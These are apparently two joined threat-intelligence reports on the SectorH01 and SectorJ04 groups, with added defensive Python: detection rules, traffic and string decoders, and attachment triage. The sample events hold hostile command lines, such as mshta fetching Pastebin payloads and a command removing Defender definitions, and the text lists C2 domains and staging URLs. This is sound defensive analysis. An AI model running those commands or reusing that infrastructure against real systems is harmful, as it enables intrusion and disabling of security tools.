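     "value": "mshta.exe http://pastebin.com/raw/2gY9SAwU", "process": "mshta.exe"},
    {"type": "process", "image": r"C:\Program Files\Windows Defender\MpCmdRun.exe",
     "cmdline": "MpCmdRun.exe -removedefinitions -dynamicsignatures", "parent": "mshta.exe"},
    {"type": "process", "image": r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe",
     "cmdline": "MSBuild.exe", "parent": "powershell.exe"},
    # benign look-alikes that must not fire: a local .hta and an ordinary backup task
    {"type": "process", "image": r"C:\Windows\System32\mshta.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"', "parent": "explorer.exe"},
    {"type": "process", "image": r"C:\Windows\System32\schtasks.exe",
     "cmdline": r'schtasks /create /sc DAILY /tn "Backup" /tr "C:\Tools\backup.exe"', "parent": "cmd.exe"},
]


def basename(path):
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def script_host_with_url(text):
    """True when a command line names a script host and also carries an http(s) URL."""
    low = text.lower()
    return any(host in low for host in SCRIPT_HOSTS) and bool(URL_RE.search(text))


def check_process(ev):
    hits = []
    img, parent, cl = basename(ev["image"]), basename(ev["parent"]), ev["cmdline"]
    if img == "mshta.exe" and URL_RE.search(cl):
        hits.append(("mshta_remote_url", "T1170 Mshta"))
    if img in SCRIPT_HOSTS and parent in OFFICE_APPS:
        hits.append(("office_spawns_script_host", "T1064 Scripting"))
    if img == "schtasks.exe" and "/create" in cl.lower():
        m = TR_RE.search(cl)
        action = (m.group(1) or m.group(2)) if m else ""
        if script_host_with_url(action):
            hits.append(("schtask_script_host_url", "T1053 Scheduled Task"))
    if img == "mpcmdrun.exe" and "-removedefinitions" in cl.lower():
        hits.append(("defender_definitions_removed", "T1089 Disabling Security Tools"))
    if img == "msbuild.exe" and parent in SCRIPT_HOSTS:
        hits.append(("msbuild_from_script_host", "in-memory execution via MSBuild"))
    return hits


def check_registry(ev):
    if "\\currentversion\\run\\" in ev["key"].lower() and script_host_with_url(ev["value"]):
        return [("run_key_script_host_url", "T1060 Registry Run Keys / Startup Folder")]
    return []


def detect(events):
    """Return one finding per (event, rule) pair; an event can trigger several rules."""
    findings = []
    for idx, ev in enumerate(events):
        checker = check_process if ev["type"] == "process" else check_registry
        for rule, technique in checker(ev):
            findings.append({"index": idx, "rule": rule, "technique": technique})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_EVENTS):
        print(f"event {f['index']}: {f['rule']} ({f['technique']})")
```

None of these rules depends on the Pastebin or Blogger names themselves, which is the point: the group edits and replaces pastes, so a URL blocklist lags, while "script host plus remote URL in a persistence location" and "Defender definitions removed by a child of mshta.exe" describe the behaviour that stays constant across their campaigns.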

Usage of bit.ly, blogspot and Pastebin makes the SectorH01 group less traceable on the infrastructure side, but it is also because of this that we know their pastes center around the “hagga” user these days. As long as Pastebin tolerates this user, they are likely to continue using the account, since Pastebin pro accounts are no longer for sale.

But as pastes can easily be removed by incoming abuse reports, the SectorH01 group hedges its risk by connecting to multiple unlisted pastes. We see the same hedging on their target endpoints, where they set up multiple layers of persistence, use more than one type of RAT at the initial stage, and connect to multiple servers.

RevengeRAT

RevengeRAT is a RAT which has its malware builder and source code publicly available. It is set to use the C2 address ontothenextone[.]duckdns[.]org.

Some of the configuration settings of this RevengeRAT variant

RevengeRAT uses Base64 encoding for its C2 traffic, and this information is easily decoded. From the configuration settings, we see the key variable “Revenge-RAT” and the SPL variable “-]NK[-”, both of which are used as delimiters between the Base64 encoded data.

Information sent to the C2 in a past packet capture of this sample which can be easily decoded
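Because the delimiters are fixed strings and the fields between them are plain Base64, a packet capture of this traffic can be decoded with a few lines. As an added example that is not code from the original post or the ThreatRecon team: the Python below splits a captured payload on the “Revenge-RAT” key and the “-]NK[-” SPL string, Base64-decodes each field (repairing stripped padding), and offers a simple "does this look like RevengeRAT traffic" check for a capture-scanning script. The exact message layout (key first, SPL between fields, UTF-8 text inside the Base64) is an assumption made for the constructed sample, not something the post states.

```python
import base64
import binascii
import re

# Delimiters reported for this RevengeRAT variant in the configuration above
KEY = "Revenge-RAT"
SPL = "-]NK[-"
DELIM_RE = re.compile(re.escape(KEY) + "|" + re.escape(SPL))
B64_RE = re.compile(r"[A-Za-z0-9+/]+=*")


def b64_decode_lenient(field):
    """Decode one Base64 field, adding back any stripped '=' padding; None if it is not Base64."""
    field = field.strip()
    if not field or not B64_RE.fullmatch(field):
        return None
    padded = field + "=" * (-len(field) % 4)
    try:
        return base64.b64decode(padded, validate=True)
    except (binascii.Error, ValueError):
        return None


def decode_message(payload):
    """Split on both delimiters and decode every field; non-Base64 fields are kept as ("raw", text)."""
    fields = []
    for raw in DELIM_RE.split(payload):
        if not raw:
            continue
        decoded = b64_decode_lenient(raw)
        if decoded is None:
            fields.append(("raw", raw))
        else:
            fields.append(("b64", decoded.decode("utf-8", errors="replace")))
    return fields


def looks_like_revenge_rat(payload, min_fields=2):
    """A delimiter plus at least min_fields valid Base64 fields is a strong match for this format."""
    if KEY not in payload and SPL not in payload:
        return False
    return sum(1 for kind, _ in decode_message(payload) if kind == "b64") >= min_fields


def build_sample_message(fields):
    """Constructed only to produce a sample: KEY as the leading marker, SPL between Base64 fields."""
    return KEY + SPL + SPL.join(base64.b64encode(f.encode("utf-8")).decode("ascii") for f in fields)


# Constructed check-in message with the kind of host details a RAT reports on connect
SAMPLE_MESSAGE = build_sample_message(["Information", "WORKSTATION-01", "user1", "Microsoft Windows 10"])

if __name__ == "__main__":
    print(SAMPLE_MESSAGE)
    for kind, text in decode_message(SAMPLE_MESSAGE):
        print(kind, text)
```

In a capture-scanning loop the useful signal is `looks_like_revenge_rat` firing on TCP payloads to a dynamic-DNS host such as the duckdns address above; the decoded fields then tell you what the implant reported about the host without needing the sample itself.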

NanoCore

NanoCore is a RAT which was available for sale from 2014-2016 and has been leaked over the years. While the developer of NanoCore was arrested and sentenced last year, the RAT is still used by attackers.

In this case, the two NanoCore samples we found encoded on Pastebin attempted to connect to the C2 addresses attilabanks[.]ddns[.]net and yakka[.]duckdns[.]org. The C2 traffic of NanoCore is known to use the DES algorithm for encryption.

Summary

SectorH01 is a threat group which in most cases targets enterprise users seemingly indiscriminately; even when they target for espionage, their TTPs have been known to stay fairly constant. They remain brazen in their attacks although we see a slight improvement in their operational security: they still use relatively simple tricks such as macros and known, detected RATs (run in memory only), and connect to domains such as Pastebin and dynamic DNS services, all of which should raise red flags or at least questions. Each of these is an opportunity for organizations to detect the SectorH01 group.

Indicators of Compromise (IoCs)

Malicious Documents (SHA-256)

b4fdff7dbed8724bde2c097285ce5842373a3d5087f0d492479e62b48e3e5e2d
c763340ae4acecd3e7d85b118bbad6bb4b1d433a6398571afd4c2c27a304ab4e
e83304a5ae3e6ef366858c48aa8706d8e088aba86c724d575b4ad2e0ebaea7cd
d757406ae30d7822ebe63c28ff09ac7b1eca1a0e37e6f706c442f4f7517a624b
399b7823b707ac07c65940a30e85bdf5c0c7ed1bba5b5034ebcf189937636a44

RevengeRAT (SHA-256)

CF6293824C97C45680CF999955FD48801856B424DC6E3CEAC6D5E36BB4092856

NanoCore (SHA-256)

94B7C5C65637D33F031F1173A68C1D008DD948B6CCBAE42682F82A56D3CF6197
E841F0008D9DA41CD815F75657D305DD69FC169C64FA283BF62DECD02B3D931E

Code Injectors (SHA-256)

84833991F1705A01A11149C9D037C8379A9C2D463DC30A2FEC27BFA52D218FA6
E22D550423F05EB685AD060A71D58B306E31C473D2D0CACF5794EC424FD3F393

C2 Domains

ontothenextone[.]duckdns[.]org
haggapaggawagga[.]duckdns[.]org
attilabanks[.]ddns[.]net
yakka[.]duckdns[.]org

Abused Legitimate Services

bitly[.]com/aswoesx2yxwxxd
bitly[.]com/adsodeasda
bitly[.]com/uiQSQWSQWSNnase
bitly[.]com/aswoeosXxxwxhh
xaasxasxasx[.]blogspot[.]com/p/kudi[.]html
xasjow21d[.]blogspot[.]com/p/14[.]html
axxwnxiaxs[.]blogspot[.]com/p/13[.]html
pastebin[.]com/raw/wZSPpxaG
pastebin[.]com/raw/2gY9SAwU
pastebin[.]com/raw/qZXnhtQG
pastebin[.]com/raw/Htp0LKHg
pastebin[.]com/raw/13AGuyHY
pastebin[.]com/raw/0e5uVXL0
pastebin[.]com/raw/8uJavttD
pastebin[.]com/raw/7EdEuebH
pastebin[.]com/raw/ri21rHbF
pastebin[.]com/raw/QppWFhGC
pastebin[.]com/raw/Q8g1d6Be
pastebin[.]com/raw/VpKuzs3R
pastebin[.]com/raw/kqm60tX5
pastebin[.]com/raw/3pEVfu9k
pastebin[.]com/raw/3VNZw83B
pastebin[.]com/raw/8Q050Drg
pastebin[.]com/raw/jX4MuzmX

MITRE ATT&CK Techniques

The following is a list of MITRE ATT&CK Techniques we have observed based on our analysis of these and other related malware.

Initial Access

T1193 Spearphishing Attachment

Execution

T1059 Command-Line Interface
T1173 Dynamic Data Exchange
T1106 Execution through API
T1203 Exploitation for Client Execution
T1170 Mshta
T1086 PowerShell
T1053 Scheduled Task
T1064 Scripting
T1204 User Execution

Persistence

T1108 Redundant Access
T1060 Registry Run Keys / Startup Folder
T1053 Scheduled Task

Defense Evasion

T1140 Deobfuscate/Decode Files or Information
T1089 Disabling Security Tools
T1054 Indicator Blocking
T1202 Indirect Command Execution
T1112 Modify Registry
T1170 Mshta
T1045 Software Packing
T1055 Process Injection
T1064 Scripting
T1108 Redundant Access
T1102 Web Service

Credential Access

T1056 Input Capture
T1081 Credentials in Files
T1241 Credentials in Registry

Discovery

T1016 System Network Configuration Discovery
T1033 System Owner/User Discovery
T1057 Process Discovery
T1063 Security Software Discovery
T1082 System Information Discovery
T1083 File and Directory Discovery

Collection

T1056 Input Capture
T1123 Audio Capture
T1125 Video Capture

Command and Control

T1032 Standard Cryptographic Protocol
T1065 Uncommonly Used Port
T1094 Custom Command and Control Protocol
T1105 Remote File Copy
T1132 Data Encoding

Exfiltration

T1022 Data Encrypted
T1041 Exfiltration Over Command and Control Channel

References

[1] The Daily Beast – FBI Arrests Hacker Who Hacked No One
https://www.thedailybeast.com/fbi-arrests-hacker-who-hacked-no-one

SectorJ04 Group’s Increased Activity in 2019

Abstract

SectorJ04 is a Russia-based cybercrime group that began operating about five years ago and has conducted hacking activities for financial profit, using malware such as banking trojans and ransomware, against national and industrial sectors located across Europe, North America and West Africa.

In 2019, the SectorJ04 group expanded its hacking activities to cover various industrial sectors across Southeast Asia and East Asia, and is changing its attack pattern from targeted attacks to searching for random victims. This report includes details of the SectorJ04 group’s major hacking targets in 2019, how those targets were hacked, the characteristics of its hacking activities this year and recent cases of SectorJ04 group hacking.

SectorJ04 group activity range and hacking methods

The SectorJ04 group has maintained the scope of its existing hacking activities while expanding them to companies in various industrial sectors in East Asia and Southeast Asia. There was a significant increase in their hacking activities in 2019, especially those targeting South Korea. They mainly use spam email to deliver a backdoor to the infected system, which then executes additional commands received from the attacker’s server.

Main countries and sectors targeted

The SectorJ04 group’s preexisting targets were financial institutions in regions such as North America and Europe, or general companies such as retail and manufacturing, but they recently expanded their areas of activity to include the medical, pharmaceutical, media, energy and manufacturing industries. They do not appear to place many restrictions on the sectors targeted. The following are the sectors and countries in which SectorJ04 group activity was found in 2019.

Figure 1 SectorJ04 group’s first half activity timeline in 2019

Targeted Countries

We saw SectorJ04 group activity in Germany, Indonesia, the United States, Taiwan, India, France, Serbia, Ecuador, Argentina, South Korea, Japan, China, Britain, South Africa, Italy, Hong Kong, Romania, Ukraine, Macedonia, Russia, Switzerland, Senegal, the Philippines, UAE, Qatar, Saudi Arabia, Pakistan, Thailand, Bahrain, Turkey, Bulgaria and Bangladesh.

Figure 2 SectorJ04 group targeted countries

Targeted Industries

  • Financial-related corporate and government departments such as banks and exchanges
  • Retail business such as shopping malls and social commerce
  • Educational institutions such as universities
  • Manufacturing companies such as manufacturers of electronic products
  • Media companies such as broadcasting and media
  • Pharmaceutical and biotechnology-related companies
  • A job-seeking company
  • Energy-related companies such as urban gas and wind power generation

Hacking Techniques

The SectorJ04 group mainly uses spear phishing emails with MS Word or Excel files attached; the document files download a Microsoft Installer (MSI) file from the attacker’s server and use it to install a backdoor on the infected system. As anti-virus programs have recently begun to detect these MSI files, in some instances the macro scripts contained in the malicious documents install backdoors directly onto infected systems without using MSI files.

Figure 3 Schematic drawing for SectorJ04 group’s hacking method

Malicious documents used for hacking mainly use themes related to MS Office, and the same themes are often reused several times, changing only the language to match the victim’s.

In addition, the MSI file backdoors used by SectorJ04 mostly had valid digital signatures, and most of their malware was signed just days before it was found.

Figure 4 Part of the malicious document execution screen that the SectorJ04 group attaches to the spear phishing email
Figure 5 Part of the digital signature found in the executable used for hacking

Digital signature information found in malware

  • VAL TRADEMARK TWO LIMITED
  • ALLO LTD
  • COME AWAY FILMS LTD
  • AWAY PARTNERS LIMITED
  • ANG APPCONN LIMITED
  • START ARCHITECTURE LTD
  • SLON LTD
  • DIGITAL DR
  • FIT AND FLEX LIMITED
  • Dream Body Limited
  • BOOK A TEACHER LTD
  • MARK A EVANS LTD
  • WAL GRAY LTD
  • MISHA LONDON LTD
  • START ARCHITECTURE LT
  • BASS AUTOMOTIVE LIMITE
  • FILESWAP GLOBAL LT
  • HAB CLUB LT
  • ET HOMES LT

Main Malware Used

The SectorJ04 group mainly used their own backdoors, ServHelper and FlawedAmmy RAT, for hacking. They also used the Remote Manipulator System (RMS) RAT, a legitimate remote management software created in Russia. Once the backdoors are installed in infected systems, they are also used to distribute email stealers, botnet malware and ransomware.

They were recently confirmed to use additional backdoors called AdroMut and FlowerPippi, which are used in place of the MSI file to install other backdoors such as FlawedAmmy RAT, or to collect system information and send it to the attacker’s server.

Malware Types Found Before 2019

ServHelper
  • Initial Infection Method: An MSI file that is downloaded from a document file attached to a spear phishing email.
  • Downloaded by MSI: Nullsoft Installer
  • Characteristic: C2 response has a certain separator

FlawedAmmy RAT
  • Initial Infection Method: An MSI file that is downloaded from a document file attached to a spear phishing email.
  • Downloaded by MSI: Encoded FlawedAmmy RAT
  • Characteristics: Checks for antivirus; registers autorun with “wsus.exe”

RMS RAT
  • Initial Infection Method: An MSI file that is downloaded from a document file attached to a spear phishing email.
  • Downloaded by MSI: SFX File
  • Characteristic: Utilizes configuration files in DAT format

Malware Types Found After 2019

AdroMut
  • Initial Infection Method: Document files attached to the spear phishing emails
  • Characteristics: Internally used strings are base64-decoded and then decrypted with AES-256-ECB; infected system information is composed in JSON format (encrypted); loaded into “ComputerDefaults.exe” using the DLL side-loading technique

FlowerPippi
  • Initial Infection Method: Document files attached to the spear phishing emails
  • Characteristics: Hard-coded RC4 key; simpler functionality than AdroMut

The backdoor installed in the infected system distributes additional botnet malware, ransomware and email stealers. The email stealer collects connection protocol information (SMTP, IMAP and POP3) and account information stored in the registry by the Outlook and Thunderbird mail clients, and sends them to the attacker’s server in a specific format.

Figure 6 Format to send email credentials collected by email stealer
Figure 7 Some of the email stealer codes that access email account information stored in the registry
Figure 8 Some of the email stealer codes that access email account information stored in the registry 2

An email stealer may also have a file collection function that collects email information recorded in the metadata of files with hard-coded extensions. In addition, the malware eventually creates and executes a batch file to delete itself, removing execution traces from the infected PC.

Figure 9 Some of the file extensions that the email stealer collects data from

The SectorJ04 group is believed to collect email accounts stored on infected systems for use in subsequent attacks.

Characteristics of hacking activities of SectorJ04 group in 2019

The following are the features of the first half of 2019 activities identified through the analysis of the SectorJ04 group’s hacking activities.

  • Increased hacking activities targeting East and Southeast Asia
  • Changes in spam email format and hacking methods
  • Changes in hacking targets from specific organizations and industry groups to a large number of indiscriminate ones

Although the SectorJ04 group mainly targeted countries located in Europe or North America, it has recently expanded its field of activities to countries located in Southeast Asia and East Asia. In particular, the frequency of hacking attacks targeting South Korea has increased, and spam emails targeting China were found in May.

The changes could also be seen in attachments to spam emails used by attackers. Existing spam emails used attachments in the form of malicious documents, but attachments with HTM and HTML extensions were also found and the text included links to download malicious documents directly.

The SectorJ04 group’s initial spam emails had no body text or only short sentences, but the latest spam emails found were elaborately written and included images. A new type of backdoor called AdroMut and a new malware called FlowerPippi were also found coming from SectorJ04.

Prior to 2019, the SectorJ04 group conducted large-scale hacking activities for financial gain, using exploit kits on websites to install ransomware such as Locky and GlobeImposter, along with its banking Trojan, on its victims’ computers. Since 2019 the group has changed its hacking strategy to attacks using spam email. In particular, a number of remote control malware are used to gain access to resources such as email accounts and system login information from the infected machine, which are then used to send more spam emails and distribute their malware.

Increased hacking activities targeting East and Southeast Asia

SectorJ04 group hacking activities targeting South Korea were discovered continuously in the first half of 2019. The emails found related to invoices and tax accounting data, and had MS Word or Excel files with malicious macros attached. Malicious documents written in Korean have the same MS Office-themed characteristics as those used in hacking activities in other languages.

Figure 10 Spear phishing emails disguised as order sheets

In June 2019, continuous hacking activities targeting South Korea were found again and spam emails were written with various contents, including transaction statements, receipts and remittance cards. During that period, a number of spam emails disguised as remittance cards of the same type were found.

Figure 11 Spear phishing email disguised as a remittance card

The SectorJ04 group has carried out large-scale hacking activities targeting South Korea, while also expanding its attacks to Southeast Asian countries such as Taiwan and the Philippines. Spam emails and attachments written in Chinese were found in May, and at that time the SectorJ04 group targeted industrial sectors such as electronics and telecommunications, international schools and manufacturing.

Figure 12 Spear phishing emails written in Chinese
Figure 13 Malicious excel file execution screen written in Chinese

Changes in spam email format and hacking methods

In June, SectorJ04 group conducted hacking using spam emails written in various languages, including English, Arabic, Korean and Italian, and the emails were written with various contents, including remittance card, invoice and tax invoice.

Along with the existing method of using MS Word or Excel files as attachments, they used HTML files to download malicious documents as attachments, or included links to download malicious documents directly in the text.

In the past, the emails used in attacks had little or no content, but the latest ones are elaborate, for example including images.

Figure 14 Spear phishing email disguised as bank statement
Figure 15 Spear phishing email disguised as a hospital certificate

Changes have also been found in the hacking methods of the SectorJ04 group. In addition to their preexisting backdoors, ServHelper and FlawedAmmy, they have also been confirmed to use backdoors called AdroMut and FlowerPippi.

AdroMut downloads the malware used by the SectorJ04 group (ServHelper and FlawedAmmy RAT) from the attacker’s server and at the same time functions as a backdoor.

FlowerPippi collects information about the infected system, such as its domain, proxy settings, administrator rights and OS version, and performs functions such as executing received commands and downloading and executing DLL and EXE files.

Figure 16 Encoded Strings on the AdroMut Backdoor
Figure 17 Hard-coded RC4 key found in the FlowerPippi backdoor
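As an added example (not code from the report or from the malware), the following is the analyst-side decoder one would write for the FlowerPippi-style string scheme just described: base64-decode a blob, then RC4-decrypt it with the key that is hard-coded in the sample. The key and the string blobs are constructed placeholders; in practice the key is read out of the binary (Figure 17) and the blobs are pulled from its string table.

```python
"""String decoder for the FlowerPippi-style scheme: base64 -> RC4 -> text.
Added example, not code from the report; key and blobs are placeholders."""
import base64
import binascii


def rc4(key: bytes, data: bytes) -> bytes:
    """Plain RC4 (key scheduling + keystream generation). RC4 is symmetric,
    so the same call both encrypts and decrypts."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# Placeholder: the real key is recovered from the sample, not from this report.
HYPOTHETICAL_KEY = b"placeholder-rc4-key"


def decode_string(blob_b64: str, key: bytes = HYPOTHETICAL_KEY) -> str:
    """Reverse the malware's encoding: base64 -> RC4 -> UTF-8 text."""
    return rc4(key, base64.b64decode(blob_b64)).decode("utf-8")


def encode_string(text: str, key: bytes = HYPOTHETICAL_KEY) -> str:
    """Only used here to construct sample blobs for the demonstration."""
    return base64.b64encode(rc4(key, text.encode("utf-8"))).decode("ascii")


def decode_all(blobs, key: bytes = HYPOTHETICAL_KEY):
    """Decode every blob, keeping only results that are printable ASCII.
    A wrong key yields noise that fails this check, which is a cheap way to
    confirm a candidate key before bulk-decoding a sample's string table."""
    decoded = []
    for blob in blobs:
        try:
            text = decode_string(blob, key)
        except (binascii.Error, UnicodeDecodeError):
            continue
        if text and all(32 <= ord(c) < 127 for c in text):
            decoded.append(text)
    return decoded


if __name__ == "__main__":
    # Constructed string table standing in for what an analyst extracts.
    table = [encode_string(s) for s in ("POST", "/api/status", "Content-Type: application/json")]
    for line in decode_all(table):
        print(line)
```

The printable-ASCII filter in decode_all is the practical part: when several candidate keys are found in a sample, the one that turns the whole string table into readable text is the right one, and a partially wrong key fails quickly instead of producing confusing garbage.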

The SectorJ04 group is believed to have developed and used malware that functions as a downloader, installing or downloading further malware, to replace the MSI installation files it had used for hacking for more than six months, as the detection rate of security solutions increased.

Figure 18 Some of the digital certificate information identified in the corresponding hacking activity

The SectorJ04 group, which had used the same infection pattern and the same malware for more than six months, is believed to be changing its infection methods: downloading malware directly from malicious documents without using MSI installation files, changing its spam email format and using new types of backdoor.

Changes in hacking targets from specific organizations and industries to random ones

Until 2019, the SectorJ04 group carried out massive website-based hacking activities, mainly using ransomware and banking trojans for financial profit; since 2019 it has also been gathering information such as email accounts and system login credentials from users to secure attack resources.

This allows them to expand the range of targets of their hacking activities for financial profit. In this regard, the SectorJ04 group was found to have hacked into a company’s internal network using spear phishing emails targeting executives and employees of certain South Korean companies around February 2019.

They eventually compromised the Active Directory (AD) server, took control of the entire corporate internal network and then distributed the Clop ransomware on the AD server. In this hacking activity we also found malware for collecting email information and “AmadeyBot”, a botnet malware whose source code is available on Russian underground forums.

Figure 19 Spear phishing email used for hacking activities targeting AD servers in South Korea

They are believed to have continuously attempted to hack into companies in South Korea to distribute Clop ransomware. Attackers used spam emails disguised as being sent by the National Tax Service in May to install FlawedAmmy RAT in the infected system, during which the Clop ransomware was found using the same certificate as the FlawedAmmy RAT executable file.

Figure 20 Spear phishing email disguised as tax bill

The SectorJ04 group has shown a pattern of hacking activities that have changed from targeted attacks to a large-scale distribution of spam.

Major Malware Installation Types

The following describes three types of backdoor installation, each starting from a malicious document, identified in SectorJ04 group-related hacking cases during the first half of 2019.

Type 1 – Using encoded executable file

SectorJ04 group carried out intensive hacking on various industrial sectors, including South Korea’s media, manufacturing and universities, around February and March 2019. They used spear phishing emails to spread malicious Excel or Word files, which downloaded MSI files from the attacker’s server when run.

The MSI file installs a downloader that downloads an encoded FlawedAmmy RAT from the attacker’s server to the infected system, and the downloaded FlawedAmmy RAT registers itself for automatic execution under the name “wsus.exe”.

Figure 21 Backdoor installation type using an encoded executable file (Type 1)

FlawedAmmy RAT performs remote control functions on the infected system and decodes encoded executable files downloaded from the attacker’s server using certain hard-coded strings. It also checks whether a particular process is running to decide whether the malware should execute.

Figure 22 “Ammy Admin” string found in FlawedAmmy RAT
Figure 23 Part of decode code that uses hard-coded strings

Type 2 – Using NSIS Script

SectorJ04 group conducted hacking activities targeting financial institutions in India and Hong Kong around April 2019. Malicious documents delivered through spear phishing emails downloaded an MSI file, which delivers an NSIS installer to the infected system. The NSIS script executes the final payload, ServHelper, in DLL form using “rundll32.exe”.

Note that NSIS (Nullsoft Scriptable Install System) is a lightweight, script-based installation system for Windows developed by Nullsoft.

Figure 24 Backdoor installation type utilizing the NSIS installer (Type 2)

Decompressing the NSIS installer installed by the MSI file shows that it consists of an NSIS script with an NSI extension, ServHelper in DLL form, and “ncExec.dll”, a legitimate DLL required to run the NSIS script.

Figure 25 Uncompressed NSIS installer
Figure 26 Part of the NSIS script for running ServHelper in the DLL file format

ServHelper functions as a backdoor on the infected system and sends specific types of responses to C2 servers using delimiters such as “key”, “sysid” and “resp”. Different delimiters are sometimes found depending on the malware sample.

Figure 27 ServHelper Backdoor C2 Communication Code Partial

Type 3 – Using Self-Extracting File

SectorJ04 group carried out hacking activities targeting financial institutions in Italy and other countries around May 2019. Malicious documents delivered through spear phishing emails deliver MSI files to the infected system, and the MSI files download a self-extracting (SFX) executable. When the SFX file is executed, another SFX file inside it is executed and the final payload, RMS RAT, is delivered to the infected system.

Figure 28 Backdoor installation type utilizing SFX executable files (Type 3)

The first SFX file downloaded by the MSI file contains four files. When executed, it runs a command that renames the inner SFX file (“kernel.dll”) from the DLL extension to EXE and decompresses it using a hard-coded password. The files that make up the SFX file vary from sample to sample.

Figure 29 The first SFX file to be downloaded from an MSI file
Figure 30 “i.cmd” for decompression of the second SFX file

The decompressed second SFX file also contains four files, and as before “exit.exe” is run. “exit.exe” executes the same “i.cmd” as before, which executes RMS RAT under the file name “winserv.exe” registered in the registry. RMS RAT is legitimate remote management software created in Russia, and the files with DAT extensions contain the configuration information for running it.

Figure 31 Contents of the second SFX file, disguised with a DLL file extension
Figure 32 RMS RAT configuration file with a DAT extension

SectorJ04 Group Activity in South Korea

The following describes the activities of the SectorJ04 group found in South Korea in July and August 2019.

Hacking activities disguised as electronic tickets by large airlines

In late July, the SectorJ04 group used FlawedAmmy RAT to carry out hacking attacks on companies and universities in South Korea in sectors such as education, job recruitment, real estate and semiconductors. Spam emails targeting email accounts of the integrated mail service used by public officials were also found in this activity.

Figure 33 Spam email disguised as electronic tickets

They used spam emails disguised as being sent by large South Korean airlines, with ISO-format files as attachments. The group used the same email body to deliver spam emails to multiple targets.

Decompressing the ISO file attached to the spam email reveals an SCR file disguised with a “.pdf” extension, which is a .NET executable that downloads an MSI file. The ISO files sometimes contain LNK files instead, which, like the .NET malware, download an MSI file from a remote location.

Figure 34 A disguised SCR file identified within an ISO file
Figure 35 MSI file downloader written as .NET
Figure 36 Disguised LNK file identified within ISO file
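An added example (not code from the report) of the mail-gateway or triage check this delivery chain calls for: open the attachment container, and judge each member by its content rather than its name, so that an SCR carrying a “.pdf” double extension, a LNK shortcut, or a PE under a plain document name all surface. A ZIP built in memory stands in for the ISO attachment (reading ISO9660 needs a third-party library such as pycdlib, while the per-member checks are identical); the member names and file contents are constructed.

```python
"""Triage an archive attachment for executables disguised as documents.
Added example, not code from the report; ZIP stands in for the ISO, and
all member names and contents are constructed."""
import io
import ntpath
import zipfile

EXECUTABLE_EXT = {"exe", "scr", "com", "pif", "lnk", "msi", "js", "vbs", "hta", "cmd", "bat", "ps1"}
DOCUMENT_EXT = {"pdf", "doc", "docx", "xls", "xlsx", "rtf", "txt"}

MZ_MAGIC = b"MZ"
# ShellLinkHeader: HeaderSize 0x4C followed by the first bytes of the LinkCLSID
# 00021401-0000-0000-C000-000000000046 in little-endian order.
LNK_MAGIC = b"\x4c\x00\x00\x00\x01\x14\x02\x00"


def sniff(head: bytes) -> str:
    """Identify a file by its leading bytes rather than its extension."""
    if head.startswith(MZ_MAGIC):
        return "pe"
    if head.startswith(LNK_MAGIC):
        return "lnk"
    if head.startswith(b"%PDF"):
        return "pdf"
    return "unknown"


def inspect_archive(data: bytes):
    """Return [(member name, [reasons])] for every suspicious member."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            base = ntpath.basename(info.filename.replace("/", "\\")).lower()
            parts = base.split(".")
            ext = parts[-1] if len(parts) > 1 else ""
            reasons = []
            if ext in EXECUTABLE_EXT:
                reasons.append(f"executable extension .{ext}")
            if len(parts) >= 3 and parts[-2] in DOCUMENT_EXT and ext in EXECUTABLE_EXT:
                reasons.append(f"double extension .{parts[-2]}.{ext}")
            with zf.open(info) as fh:
                kind = sniff(fh.read(16))
            if kind in ("pe", "lnk"):
                if ext in EXECUTABLE_EXT:
                    reasons.append(f"content is {kind}")
                else:
                    reasons.append(f"content is {kind} but extension is .{ext}")
            if reasons:
                findings.append((info.filename, reasons))
    return findings


def build_sample() -> bytes:
    """Constructed attachment: two disguised executables, a PE under a plain
    .pdf name, and two benign members."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("E-Ticket.pdf.scr", MZ_MAGIC + b"\x90" * 62 + b"PE\x00\x00")
        zf.writestr("Itinerary.pdf.lnk", LNK_MAGIC + b"\x00" * 68)
        zf.writestr("Receipt.pdf", MZ_MAGIC + b"\x00" * 30)
        zf.writestr("Notes.txt", b"Plain text")
        zf.writestr("Terms.pdf", b"%PDF-1.4\n")
    return buf.getvalue()


if __name__ == "__main__":
    for name, reasons in inspect_archive(build_sample()):
        print(f"{name}: {'; '.join(reasons)}")
```

The third member shows why the magic-byte check matters: Windows Explorer hides known extensions, so a name-only rule that looks for “.scr” or “.lnk” misses a PE that was simply renamed, while the MZ check catches it regardless of what the name says.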

The following valid digital signatures were found in the MSI file downloaded from the attacker’s server. Other digital signatures issued to “HAB CLUB LT” and “LUK 4 TRANSPORT LT” were also found.

Figure 37 Digital signature information for MSI files found in hacking activities

Finally, FlawedAmmy RAT is downloaded from the remote server, and the activity uses a Base64-encoded PowerShell script to determine whether the infected system is a PC joined to an Active Directory domain.

Figure 38 PowerShell script to determine whether a PC belongs to a domain
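As an added example (not code from the report), here is the detection side of the step just described: take process-creation records, find PowerShell launched with an encoded command, decode the Base64/UTF-16LE payload, and flag scripts that probe Active Directory domain membership. The log lines are constructed for the demonstration, as is the one-line membership check inside the first of them; the pattern list is a starting point, not an exhaustive one.

```python
"""Decode -EncodedCommand payloads from process logs and flag domain probes.
Added example, not code from the report; the log lines are constructed."""
import base64
import binascii
import re

# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -enc, ...).
ENC_FLAGS = {"-" + "encodedcommand"[:n] for n in range(1, len("encodedcommand") + 1)}

# Indicators that a script is checking whether the host is domain-joined.
DOMAIN_CHECK_PATTERNS = [
    r"PartOfDomain",
    r"Win32_ComputerSystem",
    r"USERDNSDOMAIN",
    r"USERDOMAIN",
    r"GetComputerDomain",
    r"Get-ADDomain",
    r"ActiveDirectory",
]


def encode_ps(script: str) -> str:
    """PowerShell expects Base64 over UTF-16LE; used here only to build samples."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_encoded(cmdline: str):
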